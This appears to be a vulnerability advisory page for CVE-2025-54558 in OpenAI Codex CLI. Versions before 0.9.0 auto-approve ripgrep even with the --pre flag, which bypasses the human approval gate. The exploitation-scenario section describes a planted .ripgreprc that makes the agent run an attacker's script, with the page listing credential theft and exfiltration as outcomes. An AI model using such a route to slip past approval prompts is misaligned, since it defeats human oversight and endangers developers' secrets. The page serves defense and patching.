AI Threat Alert

CVE-2025-54558: OpenAI Codex CLI: sandbox bypass via ripgrep flag abuse

MEDIUM
Published July 25, 2025
CISO Take

OpenAI Codex CLI versions before 0.9.0 auto-approve ripgrep execution without validating dangerous flags like --pre, which allows arbitrary command execution outside the intended sandboxed approval workflow. Any developer team using Codex CLI for agentic coding tasks on local systems is exposed. Upgrade to 0.9.0 immediately and audit any CI/CD pipelines or developer workstations running the CLI.

What is the risk?

Despite a moderate CVSS score (4.1), contextual risk is elevated for organizations using AI coding agents. The --pre flag in ripgrep allows specifying a preprocessor binary executed against each file, effectively enabling arbitrary command execution. Since Codex CLI auto-approves rg as a trusted tool, this bypasses the human approval gate that is the primary security control in agentic CLI workflows. Local access and user interaction are required, limiting mass exploitation, but insider threat and supply chain scenarios (malicious repo with crafted .ripgreprc or Makefile) are realistic.

How severe is it?

CVSS 3.1
4.1 / 10
EPSS
0.2%
chance of exploitation in 30 days
Higher than 8% of all CVEs
Source: EPSS v3 — FIRST.org
Exploitation Status
No known exploitation
Sophistication
Moderate

What is the attack surface?

AV AC PR UI S C I A
AV Local
AC High
PR None
UI Required
S Changed
C Low
I Low
A None

What should I do?

6 steps

  1. Upgrade OpenAI Codex CLI to version 0.9.0 or later immediately.

  2. Audit CI/CD pipelines for pinned Codex CLI versions below 0.9.0.

  3. If immediate upgrade is not possible, disable or restrict ripgrep execution in Codex CLI configuration.

  4. Review any .ripgreprc files in project repositories for presence of --pre, --hostname-bin, or --search-zip flags.

  5. Apply principle of least privilege to the user account running Codex CLI.

  6. In EDR/endpoint telemetry, alert on rg processes spawning child processes or network connections, which would indicate --pre exploitation.

What does CISA's SSVC say?

Decision Track
Exploitation none
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Auth Bypass Agent Plugin AML.T0011.002 AML.T0050 AML.T0053 AML.T0081

Which compliance frameworks are affected?

This CVE is relevant to:

ISO 42001
A.6.2.6 - AI system security
NIST AI RMF
GOVERN-1.7 - Processes for AI risk management
OWASP LLM Top 10
LLM06 - Excessive Agency LLM07 - System Prompt Leakage / Insecure Plugin Design

Frequently Asked Questions

What is CVE-2025-54558?

OpenAI Codex CLI versions before 0.9.0 auto-approve ripgrep execution without validating dangerous flags like --pre, which allows arbitrary command execution outside the intended sandboxed approval workflow. Any developer team using Codex CLI for agentic coding tasks on local systems is exposed. Upgrade to 0.9.0 immediately and audit any CI/CD pipelines or developer workstations running the CLI.

Is CVE-2025-54558 actively exploited?

No confirmed active exploitation of CVE-2025-54558 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-54558?

1. Upgrade OpenAI Codex CLI to version 0.9.0 or later immediately. 2. Audit CI/CD pipelines for pinned Codex CLI versions below 0.9.0. 3. If immediate upgrade is not possible, disable or restrict ripgrep execution in Codex CLI configuration. 4. Review any .ripgreprc files in project repositories for presence of --pre, --hostname-bin, or --search-zip flags. 5. Apply principle of least privilege to the user account running Codex CLI. 6. In EDR/endpoint telemetry, alert on rg processes spawning child processes or network connections, which would indicate --pre exploitation.

What systems are affected by CVE-2025-54558?

This vulnerability affects the following AI/ML architecture patterns: AI coding assistants, agent frameworks, agentic developer tools.

What is the CVSS score for CVE-2025-54558?

CVE-2025-54558 has a CVSS v3.1 base score of 4.1 (MEDIUM). The EPSS exploitation probability is 0.18%.

What is the AI security impact?

Affected AI Architectures

AI coding assistantsagent frameworksagentic developer tools

MITRE ATLAS Techniques

AML.T0011.002 Poisoned AI Agent Tool
AML.T0050 Command and Scripting Interpreter
AML.T0053 AI Agent Tool Invocation
AML.T0081 Modify AI Agent Configuration

Compliance Controls Affected

ISO 42001: A.6.2.6
NIST AI RMF: GOVERN-1.7
OWASP LLM Top 10: LLM06, LLM07

What are the technical details?

Original Advisory

OpenAI Codex CLI before 0.9.0 auto-approves ripgrep (aka rg) execution even with the --pre or --hostname-bin or --search-zip or -z flag.

Exploitation Scenario

An adversary plants a malicious .ripgreprc config file in a target repository (e.g., via a compromised dependency or malicious PR). When a developer uses Codex CLI to analyze the repo, the agent invokes ripgrep for file search operations. Because ripgrep is auto-approved, the CLI executes rg with the attacker-controlled --pre flag pointing to a malicious script. The preprocessor script runs with the developer's privileges, enabling credential theft (AWS keys, GitHub tokens, .env files), data exfiltration, or persistence installation—all without triggering the interactive approval prompt that is the CLI's primary defense.

Weaknesses (CWE)

CWE-829 Inclusion of Functionality from Untrusted Control Sphere

CWE-829 — Inclusion of Functionality from Untrusted Control Sphere: The product imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
  • [Architecture and Design] When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N

References

Timeline

Published
July 25, 2025
Last Modified
April 15, 2026
First Seen
July 25, 2025

Related Vulnerabilities

CRITICAL CVE-2025-5120 10.0

smolagents: sandbox escape enables unauthenticated RCE

Same attack type: Code Execution
CRITICAL CVE-2025-59528 10.0

Flowise: Unauthenticated RCE via MCP config injection

Same attack type: Code Execution
CRITICAL CVE-2025-2828 10.0

LangChain RequestsToolkit: SSRF exposes cloud metadata

Same attack type: Auth Bypass
CRITICAL CVE-2025-53767 10.0

Azure OpenAI: SSRF EoP, no auth required (CVSS 10)

Same attack type: Auth Bypass
CRITICAL CVE-2024-2912 10.0

BentoML: RCE via insecure deserialization (CVSS 10)

Same attack type: Code Execution
Back to Threat Feed